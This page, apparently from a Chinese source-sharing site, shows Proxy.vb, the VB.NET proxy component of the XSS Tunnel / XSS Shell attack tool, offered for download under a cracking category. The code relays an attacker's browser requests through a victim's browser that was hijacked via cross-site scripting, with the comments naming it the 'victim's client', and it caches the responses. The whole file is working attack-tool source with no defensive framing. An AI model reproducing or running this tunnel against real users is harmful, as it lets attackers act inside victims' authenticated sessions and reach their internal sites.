开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > 系统/网络安全 > 破解 > 查看源码
Proxy.vb
资源名称:xssshell.rar [点击查看]
上传用户:wangting
上传日期:2020-01-24
资源大小:2226k
文件大小:18k
源码类别:

破解

开发平台:

ASP/ASPX

Proxy.vb:源码内容
  1. #Region "GPL License"
  3. 'This file is part of XSS Tunnel.
  4. '
  5. 'XSS Tunnel, XSS Tunneling tool 
  6. 'Copyright (C) 2007 Ferruh Mavituna
  8. 'This program is free software; you can redistribute it and/or
  9. 'modify it under the terms of the GNU General Public License
  10. 'as published by the Free Software Foundation; either version 2
  11. 'of the License, or (at your option) any later version.
  13. 'This program is distributed in the hope that it will be useful,
  14. 'but WITHOUT ANY WARRANTY; without even the implied warranty of
  15. 'MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  16. 'GNU General Public License for more details.
  18. 'You should have received a copy of the GNU General Public License
  19. 'along with this program; if not, write to the Free Software
  20. 'Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
  21. #End Region
  23. Imports System.Net.Sockets
  24. Imports System.Net
  25. Imports System.IO
  28. ''' <summary>
  29. ''' Proxy Implementation for XSS Tunnel
  30. ''' </summary>
  31. ''' <remarks>
  32. ''' Get requests from client tunnel them to supplied XSSShell and reply browser
  33. ''' Doesn't support KeepAlive Proxy Connections 
  34. '''
  35. ''' 21.06.2007
  36. ''' - Now Cache folder in temp folder to avoid potential permission problems
  37. ''' - Clear Cache added
  38. ''' - Stupid bind bug fixed caused by a mispelled variable name!
  39. ''' </remarks>
  40. Public Class Proxy
  43. #Region "Events"
  45.     ''' <summary>
  46.     ''' Resource Requested
  47.     ''' </summary>
  48.     ''' <param name="path"></param>
  49.     ''' <remarks></remarks>
  50.     Public Event Requested(ByVal path As String)
  52.     ''' <summary>
  53.     ''' Response Received from XSS Shell (victim's client)
  54.     ''' </summary>
  55.     ''' <param name="response"></param>
  56.     ''' <remarks></remarks>
  57.     Public Event ResponseReceived(ByVal response As ReadableResponse)
  60.     ''' <summary>
  61.     ''' Debug message sent
  62.     ''' </summary>
  63.     ''' <param name="message"></param>
  64.     ''' <param name="sender"></param>
  65.     ''' <remarks></remarks>
  66.     Public Event DebugMessageSent(ByVal message As String, ByVal sender As Object)
  68. #End Region
  70. #Region "Constants"
  72.     ''' <summary>
  73.     ''' Default Read Buffer Size
  74.     ''' </summary>
  75.     ''' <remarks></remarks>
  76.     Public Const DefaultBufferSize As Integer = 4096
  78.     ''' <summary>
  79.     ''' Default Buffer Increase Multiplier
  80.     ''' </summary>
  81.     ''' <remarks></remarks>
  82.     Public Const DefaultIncreaseMultiplier As Integer = 3
  85.     ''' <summary>
  86.     ''' Is Keep Alive supported by client (normally should be extracted from HTTP Headers)
  87.     ''' </summary>
  88.     ''' <remarks></remarks>
  89.     Public Const KeepAlive As Boolean = False
  91.     ''' <summary>
  92.     ''' Keep Alive Supported by Proxy
  93.     ''' </summary>
  94.     ''' <remarks></remarks>
  95.     Public Const KeepAliveSupported As Boolean = False
  99. #End Region
  101. #Region "Constructor"
  103.     ''' <summary>
  104.     ''' New Proxy
  105.     ''' </summary>
  106.     ''' <param name="XSSShell"></param>
  107.     ''' <remarks></remarks>
  108.     Public Sub New(ByVal XSSShell As XSSShell)
  109.         Me.XSSSHell = XSSShell
  110.     End Sub
  112.     ''' <summary>
  113.     ''' New Proxy 
  114.     ''' </summary>
  115.     ''' <param name="XSSShell"></param>
  116.     ''' <param name="port"></param>
  117.     ''' <param name="IPAddress"></param>
  118.     ''' <remarks></remarks>
  119.     Public Sub New(ByVal XSSShell As XSSShell, ByVal port As Integer, ByVal IPAddress As IPAddress)
  120.         Me.XSSSHell = XSSShell
  121.         Me.Port = port
  122.         Me.IPAddress = IPAddress
  123.     End Sub
  125. #End Region
  127. #Region "Properties"
  129.     Private _Cached As Integer
  131.     ''' <summary>
  132.     ''' Cached Requests
  133.     ''' </summary>
  134.     ''' <value></value>
  135.     ''' <returns></returns>
  136.     ''' <remarks></remarks>
  137.     Public ReadOnly Property CachedRequests() As Integer
  138.         Get
  139.             Return _Cached
  140.         End Get
  141.     End Property
  143.     Private _Requests As Integer
  145.     ''' <summary>
  146.     ''' Requests 
  147.     ''' </summary>
  148.     ''' <value></value>
  149.     ''' <returns></returns>
  150.     ''' <remarks></remarks>
  151.     Public ReadOnly Property Requests() As Integer
  152.         Get
  153.             Return _Requests
  154.         End Get
  155.     End Property
  157.     Private _Responses As Integer
  159.     ''' <summary>
  160.     ''' Responses 
  161.     ''' </summary>
  162.     ''' <value></value>
  163.     ''' <returns></returns>
  164.     ''' <remarks></remarks>
  165.     Public ReadOnly Property Responses() As Integer
  166.         Get
  167.             Return _Responses
  168.         End Get
  169.     End Property
  172.     Public _Port As Integer
  173.     ''' <summary>
  174.     ''' Port to Bind
  175.     ''' </summary>
  176.     ''' <value></value>
  177.     ''' <returns></returns>
  178.     ''' <remarks>Default : 8080</remarks>
  179.     Private Property Port() As Integer
  180.         Get
  181.             If _Port = 0 Then _Port = 65000
  182.             Return _Port
  183.         End Get
  184.         Set(ByVal value As Integer)
  185.             'TODO : Restart server when change
  186.             _Port = value
  187.         End Set
  188.     End Property
  191.     Private _XSSShell As XSSShell
  192.     ''' <summary>
  193.     ''' Related XSS Shell to tunnel data
  194.     ''' </summary>
  195.     ''' <value></value>
  196.     ''' <returns></returns>
  197.     ''' <remarks></remarks>
  198.     Public Property XSSSHell() As XSSShell
  199.         Get
  200.             Return _XSSShell
  201.         End Get
  202.         Set(ByVal value As XSSShell)
  203.             _XSSShell = value
  204.         End Set
  205.     End Property
  209.     Dim _RequestListener As TcpListener
  211.     ''' <summary>
  212.     ''' Request Listener
  213.     ''' </summary>
  214.     ''' <value></value>
  215.     ''' <returns></returns>
  216.     ''' <remarks></remarks>
  217.     Private ReadOnly Property RequestListener() As TcpListener
  218.         Get
  219.             Try
  221.                 If _RequestListener Is Nothing Then _RequestListener = New TcpListener(Me.IPAddress, Port)
  222.             Catch ex As Exception
  223.                 WriteConsole("!Error proxy couldn't start to listen : " & ex.ToString)
  225.             End Try
  227.             'Dns.Resolve(Dns.GetHostName()).AddressList(0)
  229.             Return _RequestListener
  230.         End Get
  231.     End Property
  234.     Private _IPAddress As IPAddress
  235.     ''' <summary>
  236.     ''' IP Address to bind
  237.     ''' </summary>
  238.     ''' <value></value>
  239.     ''' <returns></returns>
  240.     ''' <remarks></remarks>
  241.     Private Property IPAddress() As IPAddress
  242.         Get
  243.             If _IPAddress Is Nothing Then IPAddress = IPAddress.Any
  244.             Return _IPAddress
  245.         End Get
  246.         Set(ByVal value As IPAddress)
  247.             _IPAddress = value
  248.         End Set
  249.     End Property
  251.     Private _ProxyMode As Boolean
  252.     ''' <summary>
  253.     ''' Act as a proper proxy, do not use XSSSHell 
  254.     ''' </summary>
  255.     ''' <value></value>
  256.     ''' <returns></returns>
  257.     ''' <remarks></remarks>
  258.     Public Property ProxyMode() As Boolean
  259.         Get
  260.             Return _ProxyMode
  261.         End Get
  262.         Set(ByVal value As Boolean)
  263.             _ProxyMode = value
  264.         End Set
  265.     End Property
  267.     Private _CacheEnabled As Boolean
  268.     ''' <summary>
  269.     ''' Enable caching
  270.     ''' </summary>
  271.     ''' <value></value>
  272.     ''' <returns></returns>
  273.     ''' <remarks></remarks>
  274.     Public Property CacheEnabled() As Boolean
  275.         Get
  276.             Return _CacheEnabled
  277.         End Get
  278.         Set(ByVal value As Boolean)
  279.             _CacheEnabled = value
  280.         End Set
  281.     End Property
  285. #End Region
  287. #Region "Core"
  289.     ''' <summary>
  290.     ''' Start Listen for incoming Connections
  291.     ''' </summary>
  292.     ''' <remarks></remarks>
  293.     Public Sub Listen()
  295.         Try
  296.             RequestListener.Start()
  298.         Catch ex As Exception
  299.             WriteConsole("!Proxy start error : " & ex.ToString)
  300.             Exit Sub
  302.         End Try
  304.         WriteConsole("Started to Listen : " & Me.IPAddress.ToString & ":" & Port)
  306.         While True
  308.             Try
  310.                 Dim Client As TcpClient = RequestListener.AcceptTcpClient()
  311.                 Dim ClientIP As IPEndPoint = CType(Client.Client.RemoteEndPoint, IPEndPoint)
  313.                 Console.WriteLine(ClientIP.Address.ToString() & ":" & ClientIP.Port.ToString() & " Connected...")
  315.                 Try
  316.                     Dim Thr As Threading.Thread
  317.                     'If ProxyMode Then
  318.                     '    Thr = New Threading.Thread(AddressOf ProcessRequest)
  320.                     'Else
  321.                     Thr = New Threading.Thread(AddressOf Me.ProcessTunnelledRequest)
  323.                     'End If
  326.                     Thr.Start(Client)
  328.                 Catch ex As Exception
  329.                     WriteConsole("Thread Failed : " & ex.ToString)
  331.                 End Try
  333.             Catch ex As Net.Sockets.SocketException
  334.                 WriteConsole("Stopped to listen!")
  335.                 Exit Sub
  337.             End Try
  340.         End While
  342.     End Sub
  345.     ''' <summary>
  346.     ''' Raise Debug/Console Messages
  347.     ''' </summary>
  348.     ''' <param name="message"></param>
  349.     ''' <remarks></remarks>
  350.     Private Sub WriteConsole(ByVal message As String)
  351.         Debug.WriteLine(message)
  352.         RaiseEvent DebugMessageSent(message, Me)
  353.     End Sub
  356.     ''' <summary>
  357.     ''' Stop Listening
  358.     ''' </summary>
  359.     ''' <remarks></remarks>
  360.     Public Sub [Stop]()
  361.         RequestListener.Stop()
  362.     End Sub
  365.     ''' <summary>
  366.     ''' Read Request from TCPClient, fill buffer
  367.     ''' </summary>
  368.     ''' <param name="client"></param>
  369.     ''' <param name="requestBuffer"></param>
  370.     ''' <returns>Read byte, -1 if it fails</returns>
  371.     ''' <remarks></remarks>
  372.     Private Function ReadRequest(ByVal client As TcpClient, ByRef requestBuffer As Byte()) As Integer
  373.         Dim ReadData As Integer
  374.         Dim RequestReadOffset As Integer
  376.         Try
  377.             Do
  378.                 'If there is no space in request buffer increase buffer (should be a huge one!)
  379.                 If requestBuffer.Length < RequestReadOffset + client.ReceiveBufferSize Then
  380.                     Array.Resize(Of Byte)(requestBuffer, requestBuffer.Length * DefaultIncreaseMultiplier)
  381.                     WriteConsole("Array Resized")
  382.                 End If
  384.                 ReadData = client.GetStream.Read(requestBuffer, RequestReadOffset, client.ReceiveBufferSize)
  385.                 RequestReadOffset += ReadData
  387.                 If ReadData < 1 Then Exit Do
  388.             Loop While Text.Encoding.ASCII.GetString(requestBuffer, 0, RequestReadOffset).IndexOf(vbNewLine & vbNewLine) = -1
  390.         Catch ex As Exception
  391.             WriteConsole("Client TCP closed etc. Error")
  392.             Return -1
  394.         End Try
  396.         Return RequestReadOffset
  397.     End Function
  400.     '''' <summary>
  401.     '''' Write buffer
  402.     '''' </summary>
  403.     '''' <param name="buffer"></param>
  404.     '''' <remarks></remarks>
  405.     'Private Shared Sub DebugBuffer(ByVal buffer() As Byte, ByVal title As String)
  406.     '    Debug.WriteLine("------" & title & "------")
  407.     '    Debug.WriteLine(System.Text.Encoding.ASCII.GetString(buffer).Trim())
  408.     '    Debug.WriteLine("------------")
  409.     'End Sub
  411.     Dim ErrorPage As String = "HTTP/1.1 200 OK" & vbNewLine & "Server: XSS Shell Proxy" & vbNewLine & "Content-Type: text/html" & vbNewLine & vbNewLine & "<html><head><title>Denied by XSS Shell Proxy</title></head><body><div style=""text-align:center"">This request is not supported by <em>XSS Shell Proxy</em></div></body></html>"
  414. #End Region
  416. #Region "XSS Tunnel"
  417.     ''' <summary>
  418.     ''' Get Cache Directory
  419.     ''' </summary>
  420.     ''' <returns></returns>
  421.     ''' <remarks></remarks>
  422.     Private Shared Function GetCacheDirectory() As String
  423.         'Dim CacheDir As String = IO.Path.Combine(My.Application.Info.DirectoryPath, "cache")
  424.         Dim CacheDir As String = IO.Path.Combine(IO.Path.GetTempPath(), "XSSTunnel-Cache")
  426.         If Not Directory.Exists(CacheDir) Then
  427.             Directory.CreateDirectory(CacheDir)
  428.         End If
  430.         Return CacheDir
  431.     End Function
  433.     ''' <summary>
  434.     ''' Clear files in the cache folder
  435.     ''' </summary>
  436.     ''' <remarks></remarks>
  437.     Public Shared Sub ClearCache()
  438.         Dim CacheFolder As String = GetCacheDirectory()
  439.         IO.Directory.Delete(CacheFolder, True)
  440.     End Sub
  443.     ''' <summary>
  444.     ''' Get file from local cache
  445.     ''' </summary>
  446.     ''' <param name="path"></param>
  447.     ''' <returns></returns>
  448.     ''' <remarks></remarks>
  449.     Private Function GetFromCache(ByVal path As String) As Byte()
  451.         If Not Me.CacheEnabled OrElse Not Cachable(path) Then Return Nothing
  453.         Dim SaveFileName As String = GetCacheFileName(path)
  454.         If File.Exists(SaveFileName) Then
  455.             Return File.ReadAllBytes(SaveFileName)
  456.         End If
  458.         Return Nothing
  459.     End Function
  461.     ''' <summary>
  462.     ''' Get path's cache file name
  463.     ''' </summary>
  464.     ''' <param name="path"></param>
  465.     ''' <returns></returns>
  466.     ''' <remarks></remarks>
  467.     Private Shared Function GetCacheFileName(ByVal path As String) As String
  468.         Dim CacheDir As String = GetCacheDirectory()
  469.         Dim SaveFileName As String = GetValidFileName(path)
  470.         Return IO.Path.Combine(CacheDir, SaveFileName)
  471.     End Function
  474.     ''' <summary>
  475.     ''' Is response / request cachable ?
  476.     ''' </summary>
  477.     ''' <param name="path"></param>
  478.     ''' <returns></returns>
  479.     ''' <remarks></remarks>
  480.     Private Function Cachable(ByVal path As String) As Boolean
  482.         Try
  484.             Select Case IO.Path.GetExtension(path)
  485.                 Case ".gif", ".jpg", ".js", ".css"
  486.                     Return True
  487.             End Select
  488.         Catch ex As Exception
  489.             WriteConsole("Unexpected path")
  491.         End Try
  493.         Return False
  494.     End Function
  496.     ''' <summary>
  497.     ''' Cache Response
  498.     ''' </summary>
  499.     ''' <param name="path"></param>
  500.     ''' <remarks></remarks>
  501.     Private Sub CacheResponse(ByVal path As String, ByVal content As Byte())
  502.         If Not Cachable(path) Then Exit Sub
  504.         Dim SaveFileName As String = GetCacheFileName(path)
  505.         Try
  506.             File.WriteAllBytes(SaveFileName, content)
  508.         Catch ex As Exception
  509.             WriteConsole("Cache write err!")
  511.         End Try
  516.     End Sub
  519.     ''' <summary>
  520.     ''' Get valid file name
  521.     ''' </summary>
  522.     ''' <param name="path"></param>
  523.     ''' <returns></returns>
  524.     ''' <remarks></remarks>
  525.     Private Shared Function GetValidFileName(ByVal path As String) As String
  527.         Dim FileName As String = path.Replace("/", "-").Replace("", "-")
  528.         For Each Chr As Char In IO.Path.GetInvalidPathChars
  529.             FileName = FileName.Replace(Chr, String.Empty)
  530.         Next
  532.         Return FileName
  533.     End Function
  537.     ''' <summary>
  538.     ''' Process Tunneled Request
  539.     ''' </summary>
  540.     ''' <param name="tcpClient"></param>
  541.     ''' <remarks></remarks>
  542.     Private Sub ProcessTunnelledRequest(ByVal tcpClient As Object)
  544.         Dim Browser As TcpClient = DirectCast(tcpClient, TcpClient)
  545.         Browser.ReceiveBufferSize = DefaultBufferSize
  547.         While True
  548.             Dim requestBuffer(Browser.ReceiveBufferSize * DefaultIncreaseMultiplier) As Byte
  550.             Dim ReadData As Integer
  551.             ReadData = ReadRequest(Browser, requestBuffer)
  553.             'Err
  554.             If ReadData = -1 Then
  555.                 Exit While
  556.             End If
  558.             'Console.WriteLine(Text.Encoding.ASCII.GetString(requestBuffer, 0, ReadData))
  560.             Dim HttpReq As New HttpParser(requestBuffer, ReadData)
  562.             'Check SSL Connections
  563.             If HttpReq.Method = HttpParser.HTTPMethod.CONNECT Then
  564.                 WriteConsole("SSL connections not supported !")
  565.                 Browser.GetStream.Close()
  566.                 Browser.Close()
  567.                 Exit Sub
  568.             End If
  571.             If HttpReq.Url Is Nothing Then
  572.                 WriteConsole("Target host couldn't identified")
  573.                 Exit Sub
  574.             End If
  577.             Dim PostData As String = Nothing
  578.             If HttpReq.Method = HttpParser.HTTPMethod.POST Then
  579.                 PostData = HttpReq.RequestBody
  580.             End If
  584.             'Send and Wait for Response
  585.             RaiseEvent Requested(HttpReq.Url.PathAndQuery)
  586.             Threading.Interlocked.Increment(_Requests)
  587.             '            Console.WriteLine("Requesting : " & HttpReq.Url.PathAndQuery)
  589.             Dim HTTPResponse As HttpResponse
  590.             Dim CachedResponse() As Byte = GetFromCache(HttpReq.Url.PathAndQuery)
  591.             If CachedResponse Is Nothing Then
  592.                 HTTPResponse = XSSSHell.SendGetUriCommand(HttpReq.Url.PathAndQuery, PostData)
  594.                 'Add it to cache
  595.                 If Not HTTPResponse Is Nothing Then CacheResponse(HttpReq.Url.PathAndQuery, HTTPResponse.Body)
  596.                 Threading.Interlocked.Increment(_Responses)
  598.             Else ' Get from cache
  599.                 HTTPResponse = New HttpResponse()
  600.                 HTTPResponse.Status = 200
  601.                 HTTPResponse.StatusText = "OK"
  602.                 HTTPResponse.Body = CachedResponse
  603.                 HTTPResponse.AddHeader("Via-Cache", "XSS Tunnel")
  605.                 'Console.WriteLine("Answer from Cache: " & HttpReq.Url.PathAndQuery)
  606.                 HTTPResponse.Cached = True
  607.                 Threading.Interlocked.Increment(_Cached)
  609.             End If
  613.             'If there is a response otherwise, don't response so client will timeout (better than finishing with 200 OK)
  614.             If Not HTTPResponse Is Nothing Then
  616.                 'Response
  617.                 RaiseEvent ResponseReceived(New ReadableResponse(HttpReq.Url.PathAndQuery, HTTPResponse.Status, HTTPResponse.Cached))
  619.                 Dim ResponseBuffer() As Byte = HTTPResponse.GetServerResponse
  621.                 'Write to client
  622.                 If Browser.Connected AndAlso Browser.GetStream.CanWrite Then
  623.                     Try
  624.                         Browser.GetStream.Write(ResponseBuffer, 0, ResponseBuffer.Length)
  626.                     Catch ex As IO.IOException
  627.                         WriteConsole("Write to browser, Error")
  629.                     End Try
  631.                 Else
  632.                     WriteConsole("Err & Cancelled!")
  634.                 End If
  636.             End If
  638.             If Not KeepAlive Then Exit While
  639.         End While
  641.         Try
  643.             If Browser.Connected Then
  644.                 Browser.GetStream.Close()
  645.                 Browser.Close()
  646.             End If
  648.         Catch ex As Exception
  649.             WriteConsole("Something stupid happened...")
  651.         End Try
  653.     End Sub
  655. #End Region
  657. End Class